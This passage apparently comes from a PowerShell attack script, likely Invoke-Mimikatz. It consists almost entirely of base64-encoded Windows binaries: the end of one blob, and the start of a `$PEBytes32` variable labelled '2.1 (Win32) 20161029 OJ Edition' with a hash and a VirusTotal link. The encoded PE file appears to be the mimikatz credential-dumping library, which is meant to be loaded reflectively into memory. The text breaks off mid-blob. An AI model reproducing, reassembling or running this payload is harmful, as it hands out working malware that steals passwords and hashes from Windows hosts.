ogijGKMoozijSKNYo2ijeKOIo5ijqKO4o8ij2KPoo/ijCKQYpCikOKRIpFikaKR4pIikmKSopLikyKTYpOik+KQIpRilKKU4pUilWKVopXiliKWYpailuKXIpdil6KX4pQimGKYopjimSKZYpmimeKaIppimqKa4psim2KbopvimCKcYpyinOKdIp1inaKd4p4inmKeop7inyKfYp+in+KcIqBioKKg4qEioWKhoqHioiKiYqKiouKjIqNio6Kj4qAipGKkoqTipSKlYqWipeKmIqZipqKm4qcip2KnoqfipCKoYqiiqOKpIqliqaKp4qoiqmKqoqriqyKrYquiq+KoIqxirKKs4q0irWKtoq3iriKuYq6iruKvIq9ir6Kv4qwisGKworDisSKxYrGiseKyIrJisqKy4rMis2KzorPisCK0YrSitOK1IrQAAAOAIAOAAAABQqWCpcKmAqZCpoKmwqcCp0KngqfCpAKoQqiCqMKpAqlCqYKpwqoCqkKqgqrCqwKrQquCq8KoAqxCrIKswq0CrUKtgq3CrgKuQq6CrsKvAq9Cr4KvwqwCsEKwgrDCsQKxQrGCscKyArJCsoKywrMCs0KzgrPCsAK0QrSCtMK1ArVCtYK1wrYCtkK2grbCtwK3QreCt8K0ArhCuIK4wrkCuUK5grnCugK6QrqCusK7ArtCu4K7wrgCvEK8grzCvQK9Qr2CvcK+Ar5CvoK+wr8Cv0K/gr/CvAAAA8AgA/AAAAACgEKAgoDCgQKBQoGCgcKCAoJCgoKCwoMCg0KDgoPCgAKEQoSChMKFAoVChYKFwoYChkKGgobChwKHQoeCh8KEAohCiIKIwokCiUKJgonCigKKQoqCisKLAotCi4KLwogCjEKMgozCjQKNQo2CjcKOAo5CjoKOwo8Cj0KPgo/CjAKQQpCCkMKRApFCkYKRwpICkkKSgpLCkwKTQpOCk8KQApRClIKUwpUClUKVgpXClgKWQpaClsKXApdCl4KXwpQCmEKYgpjCmQKZQpmCmcKaAppCmoKawpsCm0KbgpvCmAKcQpyCnMKdAp1CnYKdwp4CnAAAAEAkADAAAAJisoKwAIAkAaAEAACimOKZIplimaKZ4poimkKaYpqCmqKawprimwKbIptCm2KbgpvCmAKcQpyCnMKdAp1CnYKdwp4CnkKegp7CnwKfQp+Cn8KcAqBCoIKgwqECoUKhgqHCogKiQqKCosKjAqNCo4KjwqACpEKkgqTCpQKlQqWCpcKmAqZCpoKmwqcCp0KngqfCpAKoQqiCqMKpAqlCqYKpwqoCqkKqgqrCqwKrQquCq8KoAqxCrIKswq0CrUKtgq2ircKt4q4CriKuQq5iroKuoq7CruKvAq8ir0KvYq+Cr6Kvwq/irAKwIrBCsGKwgrDCsQKxQrGCscKyArJCsoKywrMCs0KzgrPCsAK0QrSCtMK1ArVCtYK1wrYCtkK2grbCtwK3QreCt8K0ArhCuIK4wrkCuUK5grnCugK6QrqCusK7ArtCu4K7wrgCvEK8grzCvQK9Qr2CvcK+Ar5CvoK+wr8Cv0K/gr/CvAAAAMAkApAAAAACgEKAgoDCgQKBQoGCgcKCAoJCgoKCwoMCg0KDgoPCgAKEQoSChMKFAoVChYKFwoYChkKGwobihwKHIodCh4KHoofCh+KEAogiiEKIYoiCiKKIwojiiQKKwo7ijwKPIo/CjcKR4pICkiKSQpJikoKSopJClmKWgpail0KUgqCioMKg4qGCoIKkoqTCpOKlgqZCqmKqgqqiq0KoAAABACQCEAAAA8KT4pAClCKUwpWincKd4p4CnkKeYp6CnqKewp7inwKfIp9Cn2KcAqAioGKggqCioMKg4qECoSKhQqFioYKhoqHCoeKiAqIiokKiYqKCoqKiwqLiowKjIqNCocKl4qYCpiKmQqZipoKmoqbCpuKnAqdiqSK1QrVitYK0AAABQCQBIAAAAKKAwoDigQKBIoFCgMKI4okCiSKJQooiikKKYoqCiqKKworiiwKLIotCi2KLgogijEKNIrVitaK1wrXitiK2YrQBgCQBUAAAACKYQphimKKYwpjimiKaQpqimsKa4psCmyKbQptim4KbopvCmyKfQp+in8Kf4pzisQKxYrPisAK0YrbCvuK/Ar9Cv2K/gr+iv8K/4rwBwCQA4AgAAAKAYoCCgOKDooNCh2KHgoeih8KH4oQCimKOgo6ijsKO4o8CjcKV4pYCliKWQpZiloKWopbCluKXApcil0KXYpeCl6KXwpfilAKYIphCmGKYgpiimMKY4pkCmSKZQplimYKZopnCmeKaApoimkKaYpqCmqKawprimwKbIptCm2Kbgpuim8Kb4pgCnCKcQpxinIKcwpzinQKdIp1CnWKdgp2incKd4p4CniKeQp5inoKeop7CnuKfAp8in0KfYp+Cn6Kfwp/inAKhAqEioUKhYqGCoaKhwqHiogKiIqJComKigqKiosKi4qMCoyKjQqNio4KjoqPCo+KgAqQipEKkYqSCpKKkwqTipQKlIqVCpWKmwqbipwKnIqdCp2Kngqeip8Kn4qQCqCKoQqhiqIKooqjCqOKpAqkiqUKpYqmCqaKpwqniqgKqIqpCqmKqgqrCquKrAqtCq2KrwqviqEKsYqzCrOKtAq1CrWKtgq3CreKuAq5CrmKuwq7ir0KvYq/Cr+KsQrBisMKw4rFCsWKxwrHiskKyYrLCsuKzArNCs2KzgrPCs+KwArQitEK0YrSCtKK0wrTitQK1IrVCtWK1grWitcK14rYCtiK2QrZitoK2orbCtuK3Arcit0K3YreCt6K3wrfitEK4YrlCuWK5grmiucK54rvCu+K4ArwivEK8YryCvKK8wrzivQK9Ir1CvWK9gr2ivcK94r4CviK+Qr6CvqK+4r8CvyK/Qr9iv4K8AgAkAyAIAAAigEKAYoCCgKKAwoDigQKBYoHCgeKCAoIigkKCYoKCgqKCwoLigwKDIoNCg2KDgoOig8KAAoQihGKEgoTChOKFAoVihcKF4oYChiKGQoZihoKGoobChuKHAodih8KH4oQCiCKIQohiiIKIoojCiOKJAokiiUKJYomCiaKJwoniigKKIopCimKKgoqiisKK4osCiyKLQouiiAKMIoxCjGKMgoyijMKM4o0CjSKNQo1ijYKNoo3CjeKOAo4ijkKOYo6CjqKOwo8ij4KPoo/Cj+KMApAikEKQYpCCkKKQwpDikQKRIpFCkWKRgpGikcKR4pICkiKSQpJikoKSopMCk2KTgpOik+KQQpRilIKUopTClOKVApUilUKVYpWClaKVwpXilgKWIpZClmKWgpailsKW4pcClyKXQpdil4KXopfCl+KUApgimEKYYpiCmKKYwpjimQKZIplCmWKZgpmimcKZ4poCmiKaQppimsKbIptCm6KYApwinEKcYpyCnKKcwpzinQKdIp1CnWKdgp2incKd4p4CniKeQp5inoKeop7CnuKfAp8in0KfYp+Cn6Kfwp/inAKgIqBCoGKggqCioMKg4qFCoaKhwqHiogKiIqKCoqKiwqLiowKjIqNCo2KjgqOio8KgIqTCpUKlwqZCpmKmwqbip0KnYqfCpEKoYqiCqKKowqjiqSKpQqliqYKpoqnCqeKqAqoiqkKqYqqCqqKqwqriqwKrIqtCq2Krgquiq8Kr4qgCrCKsQqxirIKsoqzCrOKtAq0irUKtYq2CraKtwq3irgKuIq5CrmKugq6irsKu4q8CryKvQq9ir4Kvoq/Cr+KsArAisEKwYrCCsKKwwrDisQKxIrFCsWKxgrGiscKx4rICsiKyQrJisoKyorLCsuKzArMis0KzYrOCs6KzwrPisAK0IrRCtGK24rgAAAJAJABwAAACAo4ijkKOYo2ikeKSApIikoKSopADgCwAQAAAAyKzgrOisAAAAYAwACAEAAGChqKHIoeihCKIooliicKJ4ooCiuKLAohCjSKVwqHiogKiIqJComKigqKiosKi4qMio0KjYqOCo6KjwqPioAKmQqZipKKs4q0CrSKtQq3irgKuIq5CrmKugq6irsKu4q8ir8KsArBCsIKxArEisWKxwrIiskKygrKisuKzArNCs2KzorPCsAK0IrRitIK0wrTitSK1grXitgK2QrZitqK2wrcCt2K3grfCt+K0IrhCuIK4orjiuQK5QrliuaK5wroCuiK6YrqCusK64rsiu4K7orviuAK8QrxivKK8wr0CvSK9Yr2CvcK94r4ivkK+gr6ivuK/Ar9Cv2K/or/CvAAAAcAwAYAEAAACgCKAYoCCgMKA4oEigUKBgoHigkKCYoKigsKDAoMig2KDgoPCg+KAIoRChIKEooTihQKFQoVihaKFwoYChiKGYoaChsKG4ocih0KHgoeih+KEAohCiKKIwokCiSKJYonCiiKKgorii0KLoogCjCKMYoyCjMKM4o0ijYKN4o5CjqKOwo3iliKWYpbClwKXQpeil+KUIplimaKZwpnimgKaoprCmuKbApsim0KbYpuCmCKcYp0CnUKd4p4insKfAp+in+KcgqDCoWKhoqJCooKjIqNioAKkQqUipcKl4qYCpqKm4qfCpGKogqiiqUKpgqoiqmKrAqtCq+KoIqzCrQKtoq3iroKuwq9ir6KsQrCCsSKxYrICskKy4rMis8KwArSitOK1grXCtmK2ordCt4K0IrhiuQK5QrniuiK6wrsCu6K74riCvMK9Yr2ivkK+gr8iv0K/YrwAAAIAMANgAAAAAoAigEKA4oECgSKBwoHiggKCooLCguKDgoOig8KAYoSChKKFAoVChYKF4oYihmKGwocCh0KEIokCiaKJ4ooiikKKYoqCiqKKwosCi8KJAo5CjIKQwpHCkgKTApNCkEKUgpWClcKWwpcClAKYQptCm4KYgpzCncKeAp8Cn0KcQqCCoYKiAqJCoyKjYqOioAKkQqVCpYKmgqbCp6Kn4qQiqgKqQquCqMKuAq+CrMKyArCCtMK1wrYCtwK3QrRCuIK6grrCu8K4Ar0CvUK+Qr6CvAJAMAIAAAAAAoBigMKBQoGCgoKCwoPCgAKFAoVCh8KEAokCiUKKQoqCi4KLwojCjQKOAo5Cj+KMApECkkKTgpDCl8KVAppCm4KYwp4CnAKhQqKCo8KhAqZCp4KkwqoCq0Kogq3CrwKsQrGCssKwQrSitgK3QrXCuwK4Qr2CvsK8AoAwAcAAAAACgUKCQoJigqKDgoPigMKFIoZCh4KEwooCi0KIgo3Cj4KPoo/ijQKSQpOCkMKWApdClIKZwprCmuKbIphCnUKdYp2insKcAqFCosKi4qMioEKlgqaCpqKm4qQCqUKqgquCq6Kr4qgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=='\n\n    # 2.1 (Win32) 20161029 OJ Edition!\n    # SHA256 hash: BE3414602121B6D23FC06EDB6BD01AD60B584485266120C242877BBD4F7C8059\n    # VirusTotal Analysis: https://www.virustotal.com/en/file/be3414602121b6d23fc06edb6bd01ad60b584485266120c242877bbd4f7c8059/analysis/1478821027/\n    $PEBytes32 = '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